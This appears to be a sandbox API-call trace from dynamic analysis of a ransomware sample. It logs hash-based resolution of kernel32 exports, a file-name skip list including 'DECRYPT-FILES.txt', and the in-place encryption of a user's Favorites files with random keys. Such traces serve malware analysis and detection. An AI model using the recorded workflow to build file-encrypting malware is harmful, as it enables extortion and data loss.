[0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.751] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.751] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.751] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.751] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.751] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.751] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.751] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.751] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.751] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.752] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.752] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.752] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.752] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.752] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.752] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.752] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.752] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.752] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.752] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.752] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.752] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.752] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.752] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.752] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.752] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.752] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.752] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.752] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.752] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.752] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.753] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.753] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.753] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.753] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.753] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.753] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.753] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.753] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.753] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.753] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.753] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.753] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.753] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.753] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.753] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.753] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.753] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.753] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.753] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.753] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.753] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.753] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.753] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.753] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.753] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.hTxRNP") returned 84 [0185.753] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.hTxRNP.5EaL6") returned 90 [0185.753] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.hTxRNP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.htxrnp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.hTxRNP.5EaL6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.htxrnp.5eal6"), dwFlags=0x0) returned 1 [0185.754] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.754] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.754] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.755] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaefc60a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url.yxQcBrQ", cAlternateFileName="WINDOW~1.YXQ")) returned 1 [0185.755] lstrcmpiW (lpString1="Windows Live Mail.url.yxQcBrQ", lpString2="DECRYPT-FILES.txt") returned 1 [0185.755] lstrcmpiW (lpString1="Windows Live Mail.url.yxQcBrQ", lpString2="autorun.inf") returned 1 [0185.755] lstrcmpiW (lpString1="Windows Live Mail.url.yxQcBrQ", lpString2="boot.ini") returned 1 [0185.755] lstrcmpiW (lpString1="Windows Live Mail.url.yxQcBrQ", lpString2="desktop.ini") returned 1 [0185.755] lstrcmpiW (lpString1="Windows Live Mail.url.yxQcBrQ", lpString2="ntuser.dat") returned 1 [0185.755] lstrcmpiW (lpString1="Windows Live Mail.url.yxQcBrQ", lpString2="iconcache.db") returned 1 [0185.755] lstrcmpiW (lpString1="Windows Live Mail.url.yxQcBrQ", lpString2="bootsect.bak") returned 1 [0185.755] lstrcmpiW (lpString1="Windows Live Mail.url.yxQcBrQ", lpString2="ntuser.dat.log") returned 1 [0185.755] lstrcmpiW (lpString1="Windows Live Mail.url.yxQcBrQ", lpString2="thumbs.db") returned 1 [0185.755] lstrcmpiW (lpString1="Windows Live Mail.url.yxQcBrQ", lpString2="Bootfont.bin") returned 1 [0185.755] lstrlenW (lpString="Windows Live Mail.url.yxQcBrQ") returned 29 [0185.755] lstrcmpiW (lpString1="yxQcBrQ", lpString2="lnk") returned 1 [0185.755] lstrcmpiW (lpString1="yxQcBrQ", lpString2="exe") returned 1 [0185.755] lstrcmpiW (lpString1="yxQcBrQ", lpString2="sys") returned 1 [0185.755] lstrcmpiW (lpString1="yxQcBrQ", lpString2="dll") returned 1 [0185.755] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0185.755] lstrlenW (lpString="Windows Live Mail.url.yxQcBrQ") returned 29 [0185.755] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0185.755] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Windows Live Mail.url.yxQcBrQ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.yxQcBrQ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.yxQcBrQ" [0185.755] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.yxQcBrQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.yxqcbrq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.756] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.756] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.756] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.756] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.756] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.756] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.757] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.757] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.757] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.757] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.757] CloseHandle (hObject=0x268) returned 1 [0185.758] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.758] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.758] CloseHandle (hObject=0x0) returned 0 [0185.759] CloseHandle (hObject=0x264) returned 1 [0185.759] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.759] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.759] GetTickCount () returned 0x1135add [0185.759] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.759] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.759] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.760] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.760] lstrlenA (lpString="kernel32.dll") returned 12 [0185.760] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.760] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.760] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.760] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.760] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.760] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.760] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.760] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.760] lstrlenA (lpString="ADDATOMA") returned 8 [0185.760] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.760] lstrlenA (lpString="ADDATOMW") returned 8 [0185.760] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.760] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.760] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.760] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.760] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.760] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.760] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.760] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.760] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.760] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.760] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.760] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.760] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.760] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.761] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.761] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.761] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.761] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.761] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.761] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.761] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.761] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.761] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.761] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.761] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.761] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.761] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.761] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.761] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.761] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.761] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.761] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.761] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.761] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.762] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.762] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.762] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.762] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.762] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.762] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.762] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.762] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.762] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.762] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.762] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.762] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.762] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.762] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.762] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.762] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 